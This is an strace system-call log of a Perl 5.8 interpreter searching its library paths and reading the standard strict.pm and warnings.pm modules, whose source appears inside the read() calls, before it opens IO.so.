9861  20:00:49.836466 stat64("/usr/share/perl/5.8/strict.pm", {st_mode=S_IFREG|0644, st_size=599, ...}) = 0
9861  20:00:49.836487 open("/usr/share/perl/5.8/strict.pm", O_RDONLY|O_LARGEFILE) = 8
9861  20:00:49.836502 ioctl(8, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfca6268) = -1 ENOTTY (Inappropriate ioctl for device)
9861  20:00:49.836514 _llseek(8, 0, [0], SEEK_CUR) = 0
9861  20:00:49.836533 read(8, "package strict;\n\n$strict::VERSION = \"1.03\";\n\nmy %bitmask = (\nrefs => 0x00000002,\nsubs => 0x00000200,\nvars => 0x00000400\n);\n\nsub bits {\n    my $bits = 0;\n    my @wrong;\n    foreach my $s (@_) {\n\tpush @wrong, $s unless exists $bitmask{$s};\n        $bits |= $bitmask{$s} || 0;\n    }\n    if (@wrong) {\n        require Carp;\n        Carp::croak(\"Unknown \'strict\' tag(s) \'@wrong\'\");\n    }\n    $bits;\n}\n\nmy $default_bits = bits(qw(refs subs vars));\n\nsub import {\n    shift;\n    $^H |= @_ ? bits(@_) : $default_bits;\n}\n\nsub unimport {\n    shift;\n    $^H &= ~ (@_ ? bits(@_) : $default_bits);\n}\n\n1;\n__END__\n\n", 4096) = 599
9861  20:00:49.836671 _llseek(8, 598, [598], SEEK_SET) = 0
9861  20:00:49.836685 _llseek(8, 0, [598], SEEK_CUR) = 0
9861  20:00:49.836696 close(8)          = 0
9861  20:00:49.836765 stat64("/etc/perl/warnings.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836796 stat64("/etc/perl/warnings.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836810 stat64("/usr/local/lib/perl/5.8.8/warnings.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836822 stat64("/usr/local/lib/perl/5.8.8/warnings.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836836 stat64("/usr/local/share/perl/5.8.8/warnings.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836849 stat64("/usr/local/share/perl/5.8.8/warnings.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836863 stat64("/usr/lib/perl5/warnings.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836877 stat64("/usr/lib/perl5/warnings.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836890 stat64("/usr/share/perl5/warnings.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836902 stat64("/usr/share/perl5/warnings.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836916 stat64("/usr/lib/perl/5.8/warnings.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836949 stat64("/usr/lib/perl/5.8/warnings.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836990 stat64("/usr/share/perl/5.8/warnings.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.837024 stat64("/usr/share/perl/5.8/warnings.pm", {st_mode=S_IFREG|0644, st_size=13018, ...}) = 0
9861  20:00:49.837060 open("/usr/share/perl/5.8/warnings.pm", O_RDONLY|O_LARGEFILE) = 8
9861  20:00:49.837074 ioctl(8, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfca6268) = -1 ENOTTY (Inappropriate ioctl for device)
9861  20:00:49.837086 _llseek(8, 0, [0], SEEK_CUR) = 0
9861  20:00:49.837104 read(8, "# -*- buffer-read-only: t -*-\n# !!!!!!!   DO NOT EDIT THIS FILE   !!!!!!!\n# This file was created by warnings.pl\n# Any changes made here will be lost.\n#\n\npackage warnings;\n\nour $VERSION = \'1.05\';\n\nuse Carp ();\n\nour %Offsets = (\n\n    # Warnings Categories added in Perl 5.008\n\n    \'all\'\t\t=> 0,\n    \'closure\'\t\t=> 2,\n    \'deprecated\'\t=> 4,\n    \'exiting\'\t\t=> 6,\n    \'glob\'\t\t=> 8,\n    \'io\'\t\t=> 10,\n    \'closed\'\t\t=> 12,\n    \'exec\'\t\t=> 14,\n    \'layer\'\t\t=> 16,\n    \'newline\'\t\t=> 18,\n    \'pipe\'\t\t=> 20,\n    \'unopened\'\t\t=> 22,\n    \'misc\'\t\t=> 24,\n    \'numeric\'\t\t=> 26,\n    \'once\'\t\t=> 28,\n    \'overflow\'\t\t=> 30,\n    \'pack\'\t\t=> 32,\n    \'portable\'\t\t=> 34,\n    \'recursion\'\t\t=> 36,\n    \'redefine\'\t\t=> 38,\n    \'regexp\'\t\t=> 40,\n    \'severe\'\t\t=> 42,\n    \'debugging\'\t\t=> 44,\n    \'inplace\'\t\t=> 46,\n    \'internal\'\t\t=> 48,\n    \'malloc\'\t\t=> 50,\n    \'signal\'\t\t=> 52,\n    \'substr\'\t\t=> 54,\n    \'syntax\'\t\t=> 56,\n    \'ambiguous\'\t\t=> 58,\n    \'bareword\'\t\t=> 60,\n    \'digit\'\t\t=> 62,\n    \'parenthesis\'\t=> 64,\n    \'precedence\'\t=> 66,\n    \'printf\'\t\t=> 68,\n    \'prototype\'\t\t=> 70,\n    \'qw\'\t\t=> 72,\n    \'reserved\'\t\t=> 74,\n    \'semicolon\'\t\t=> 76,\n    \'taint\'\t\t=> 78,\n    \'threads\'\t\t=> 80,\n    \'uninitialized\'\t=> 82,\n    \'unpack\'\t\t=> 84,\n    \'untie\'\t\t=> 86,\n    \'utf8\'\t\t=> 88,\n    \'void\'\t\t=> 90,\n    \'y2k\'\t\t=> 92,\n  );\n\nour %Bits = (\n    \'all\'\t\t=> \"\\x55\\x55\\x55\\x55\\x55\\x55\\x55\\x55\\x55\\x55\\x55\\x15\", # [0..46]\n    \'ambiguous\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\", # [29]\n    \'bareword\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\", # [30]\n    \'closed\'\t\t=> \"\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [6]\n    \'closure\'\t\t=> \"\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [1]\n    \'debugging\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\", # [22]\n    \'deprecated\'\t=> \"\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [2]\n    \'digit\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x00\", # [31]\n    \'exec\'\t\t=> \"\\x00\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [7]\n    \'exiting\'\t\t=> \"\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [3]\n    \'glob\'\t\t=> \"\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [4]\n    \'inplace\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\x00\\x00\", # [23]\n    \'internal\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\", # [24]\n    \'io\'\t\t=> \"\\x00\\x54\\x55\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [5..11]\n    \'layer\'\t\t=> \"\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [8]\n    \'malloc\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\", # [25]\n    \'misc\'\t\t=> \"\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [12]\n    \'newline\'\t\t=> \"\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [9]\n    \'numeric\'\t\t=> \"\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [13]\n    \'once\'\t\t=> \"\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [14]\n    \'overflow\'\t\t=> \"\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [15]\n    \'pack\'\t\t=> \"\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [16]\n    \'parenthesis\'\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\", # [32]\n    \'pipe\'\t\t=> \"\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [10]\n    \'portable\'\t\t=> \"\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [17]\n    \'precedence\'\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\", # [33]\n    \'printf\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\", # [34]\n    \'prototype\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\", # [35]\n    \'qw\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\", # [36]\n    \'recursion\'\t\t=> \"\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [18]\n    \'redefine\'\t\t=> \"\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [19]\n    \'regexp\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\", # [20]\n    \'reserved\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\", # [37]\n    \'semicolon\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\", # [38]\n    \'severe\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x54\\x05\\x00\\x00\\x00\\x00\\x00\", # [21..25]\n    \'signal\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\", # [26]\n    \'substr\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x40", 4096) = 4096
9861  20:00:49.837515 brk(0x81b6000)    = 0x81b6000
9861  20:00:49.837531 brk(0x81b5000)    = 0x81b5000
9861  20:00:49.837610 read(8, "\\x00\\x00\\x00\\x00\\x00\", # [27]\n    \'syntax\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x55\\x55\\x15\\x00\\x00\", # [28..38]\n    \'taint\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\", # [39]\n    \'threads\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\", # [40]\n    \'uninitialized\'\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\", # [41]\n    \'unopened\'\t\t=> \"\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [11]\n    \'unpack\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\", # [42]\n    \'untie\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\", # [43]\n    \'utf8\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\", # [44]\n    \'void\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\", # [45]\n    \'y2k\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\", # [46]\n  );\n\nour %DeadBits = (\n    \'all\'\t\t=> \"\\xaa\\xaa\\xaa\\xaa\\xaa\\xaa\\xaa\\xaa\\xaa\\xaa\\xaa\\x2a\", # [0..46]\n    \'ambiguous\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\", # [29]\n    \'bareword\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x20\\x00\\x00\\x00\\x00\", # [30]\n    \'closed\'\t\t=> \"\\x00\\x20\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [6]\n    \'closure\'\t\t=> \"\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [1]\n    \'debugging\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x20\\x00\\x00\\x00\\x00\\x00\\x00\", # [22]\n    \'deprecated\'\t=> \"\\x20\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [2]\n    \'digit\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x00\", # [31]\n    \'exec\'\t\t=> \"\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [7]\n    \'exiting\'\t\t=> \"\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [3]\n    \'glob\'\t\t=> \"\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [4]\n    \'inplace\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\", # [23]\n    \'internal\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\", # [24]\n    \'io\'\t\t=> \"\\x00\\xa8\\xaa\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [5..11]\n    \'layer\'\t\t=> \"\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [8]\n    \'malloc\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\", # [25]\n    \'misc\'\t\t=> \"\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [12]\n    \'newline\'\t\t=> \"\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [9]\n    \'numeric\'\t\t=> \"\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [13]\n    \'once\'\t\t=> \"\\x00\\x00\\x00\\x20\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [14]\n    \'overflow\'\t\t=> \"\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [15]\n    \'pack\'\t\t=> \"\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [16]\n    \'parenthesis\'\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\", # [32]\n    \'pipe\'\t\t=> \"\\x00\\x00\\x20\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [10]\n    \'portable\'\t\t=> \"\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [17]\n    \'precedence\'\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\", # [33]\n    \'printf\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x20\\x00\\x00\\x00\", # [34]\n    \'prototype\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x00\\x00\\x00\", # [35]\n    \'qw\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\", # [36]\n    \'recursion\'\t\t=> \"\\x00\\x00\\x00\\x00\\x20\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [18]\n    \'redefine\'\t\t=> \"\\x00\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [19]\n    \'regexp\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\", # [20]\n    \'reserved\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\", # [37]\n    \'semicolon\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x20\\x00\\x00\", # [38]\n    \'severe\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\xa8\\x0a\\x00\\x00\\x00\\x00\\x00\", # [21..25]\n    \'signal\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x20\\x00\\x00\\x00\\x00\\x00\", # [26]\n    \'substr\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x00\\x00\", # [27]\n    \'syntax\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xaa\\xaa\\x2a\\x00\\x00\", # [28..38]\n    \'taint\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x00\\x00\", # [39]\n    \'threads\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\", # [40]\n    \'uninitialized\'\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\", # [41]\n    \'unopened\'\t\t=> \"\\x00\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", # [11]\n    \'unpack\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\", 4096) = 4096
9861  20:00:49.838063 read(8, "x00\\x20\\x00\", # [42]\n    \'untie\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x00\", # [43]\n    \'utf8\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\", # [44]\n    \'void\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\", # [45]\n    \'y2k\'\t\t=> \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x20\", # [46]\n  );\n\n$NONE     = \"\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\";\n$LAST_BIT = 94 ;\n$BYTES    = 12 ;\n\n$All = \"\" ; vec($All, $Offsets{\'all\'}, 2) = 3 ;\n\nsub Croaker\n{\n    local $Carp::CarpInternal{\'warnings\'};\n    delete $Carp::CarpInternal{\'warnings\'};\n    Carp::croak(@_);\n}\n\nsub bits\n{\n    # called from B::Deparse.pm\n\n    push @_, \'all\' unless @_;\n\n    my $mask;\n    my $catmask ;\n    my $fatal = 0 ;\n    my $no_fatal = 0 ;\n\n    foreach my $word ( @_ ) {\n\tif ($word eq \'FATAL\') {\n\t    $fatal = 1;\n\t    $no_fatal = 0;\n\t}\n\telsif ($word eq \'NONFATAL\') {\n\t    $fatal = 0;\n\t    $no_fatal = 1;\n\t}\n\telsif ($catmask = $Bits{$word}) {\n\t    $mask |= $catmask ;\n\t    $mask |= $DeadBits{$word} if $fatal ;\n\t    $mask &= ~($DeadBits{$word}|$All) if $no_fatal ;\n\t}\n\telse\n          { Croaker(\"Unknown warnings category \'$word\'\")}\n    }\n\n    return $mask ;\n}\n\nsub import \n{\n    shift;\n\n    my $catmask ;\n    my $fatal = 0 ;\n    my $no_fatal = 0 ;\n\n    my $mask = ${^WARNING_BITS} ;\n\n    if (vec($mask, $Offsets{\'all\'}, 1)) {\n        $mask |= $Bits{\'all\'} ;\n        $mask |= $DeadBits{\'all\'} if vec($mask, $Offsets{\'all\'}+1, 1);\n    }\n    \n    push @_, \'all\' unless @_;\n\n    foreach my $word ( @_ ) {\n\tif ($word eq \'FATAL\') {\n\t    $fatal = 1;\n\t    $no_fatal = 0;\n\t}\n\telsif ($word eq \'NONFATAL\') {\n\t    $fatal = 0;\n\t    $no_fatal = 1;\n\t}\n\telsif ($catmask = $Bits{$word}) {\n\t    $mask |= $catmask ;\n\t    $mask |= $DeadBits{$word} if $fatal ;\n\t    $mask &= ~($DeadBits{$word}|$All) if $no_fatal ;\n\t}\n\telse\n          { Croaker(\"Unknown warnings category \'$word\'\")}\n    }\n\n    ${^WARNING_BITS} = $mask ;\n}\n\nsub unimport \n{\n    shift;\n\n    my $catmask ;\n    my $mask = ${^WARNING_BITS} ;\n\n    if (vec($mask, $Offsets{\'all\'}, 1)) {\n        $mask |= $Bits{\'all\'} ;\n        $mask |= $DeadBits{\'all\'} if vec($mask, $Offsets{\'all\'}+1, 1);\n    }\n\n    push @_, \'all\' unless @_;\n\n    foreach my $word ( @_ ) {\n\tif ($word eq \'FATAL\') {\n\t    next; \n\t}\n\telsif ($catmask = $Bits{$word}) {\n\t    $mask &= ~($catmask | $DeadBits{$word} | $All);\n\t}\n\telse\n          { Croaker(\"Unknown warnings category \'$word\'\")}\n    }\n\n    ${^WARNING_BITS} = $mask ;\n}\n\nmy %builtin_type; @builtin_type{qw(SCALAR ARRAY HASH CODE REF GLOB LVALUE Regexp)} = ();\n\nsub __chk\n{\n    my $category ;\n    my $offset ;\n    my $isobj = 0 ;\n\n    if (@_) {\n        # check the category supplied.\n        $category = shift ;\n        if (my $type = ref $category) {\n            Croaker(\"not an object\")\n                if exists $builtin_type{$type};\n\t    $category = $type;\n            $isobj = 1 ;\n        }\n        $offset = $Offsets{$category};\n        Croaker(\"Unknown warnings category \'$category\'\")\n\t    unless defined $offset;\n    }\n    else {\n        $category = (caller(1))[0] ;\n        $offset = $Offsets{$category};\n        Croaker(\"package \'$category\' not registered for warnings\")\n\t    unless defined $offset ;\n    }\n\n    my $this_pkg = (caller(1))[0] ;\n    my $i = 2 ;\n    my $pkg ;\n\n    if ($isobj) {\n        while (do { { package DB; $pkg = (caller($i++))[0] } } ) {\n            last unless @DB::args && $DB::args[0] =~ /^$category=/ ;\n        }\n\t$i -= 2 ;\n    }\n    else {\n        for ($i = 2 ; $pkg = (caller($i))[0] ; ++ $i) {\n            last if $pkg ne $this_pkg ;\n        }\n        $i = 2\n            if !$pkg || $pkg eq $this_pkg ;\n    }\n\n    my $callers_bitmask = (caller($i))[9] ;\n    return ($callers_bitmask, $offset, $i) ;\n}\n\nsub enabled\n{\n    Croaker(\"Usage: warnings::enabled([category])\")\n\tunless @_ == 1 || @_ == 0 ;\n\n    my ($callers_bitmask, $offset, $i) = __chk(@_) ;\n\n    return 0 unless defined $callers_bitmask ;\n    return vec($callers_bitmask, $offset, 1) ||\n           vec($callers_bitmask, $Offsets{\'all\'}, 1) ;\n}\n\nsub warn\n{\n    Croaker(\"Usage: warnings::warn([category,] \'message\')\")\n\tunless @_ == 2 || @_ == 1 ;\n\n    my $me", 4096) = 4096
9861  20:00:49.838845 read(8, "ssage = pop ;\n    my ($callers_bitmask, $offset, $i) = __chk(@_) ;\n    Carp::croak($message)\n\tif vec($callers_bitmask, $offset+1, 1) ||\n\t   vec($callers_bitmask, $Offsets{\'all\'}+1, 1) ;\n    Carp::carp($message) ;\n}\n\nsub warnif\n{\n    Croaker(\"Usage: warnings::warnif([category,] \'message\')\")\n\tunless @_ == 2 || @_ == 1 ;\n\n    my $message = pop ;\n    my ($callers_bitmask, $offset, $i) = __chk(@_) ;\n\n    return\n        unless defined $callers_bitmask &&\n            \t(vec($callers_bitmask, $offset, 1) ||\n            \tvec($callers_bitmask, $Offsets{\'all\'}, 1)) ;\n\n    Carp::croak($message)\n\tif vec($callers_bitmask, $offset+1, 1) ||\n\t   vec($callers_bitmask, $Offsets{\'all\'}+1, 1) ;\n\n    Carp::carp($message) ;\n}\n\n1;\n# ex: set ro:\n", 4096) = 730
9861  20:00:49.838995 read(8, "", 4096) = 0
9861  20:00:49.839009 close(8)          = 0
9861  20:00:49.839164 _llseek(6, 412, [412], SEEK_SET) = 0
9861  20:00:49.839192 _llseek(6, 0, [412], SEEK_CUR) = 0
9861  20:00:49.839203 close(6)          = 0
9861  20:00:49.839212 stat64("/usr/lib/perl/5.8/auto/IO/IO.so", {st_mode=S_IFREG|0644, st_size=15580, ...}) = 0
9861  20:00:49.839212 stat64("/usr/lib/perl/5.8/auto/IO/IO.bs", {st_mode=S_IFREG|0644, st_size=0, ...}) = 0
9861  20:00:49.839233 futex(0xb7f77070, 0x81 /* FUTEX_??? */, 2147483647) = 0
9861  20:00:49.839250 open("/usr/lib/perl/5.8/auto/IO/IO.so", O_RDONLY) = 6
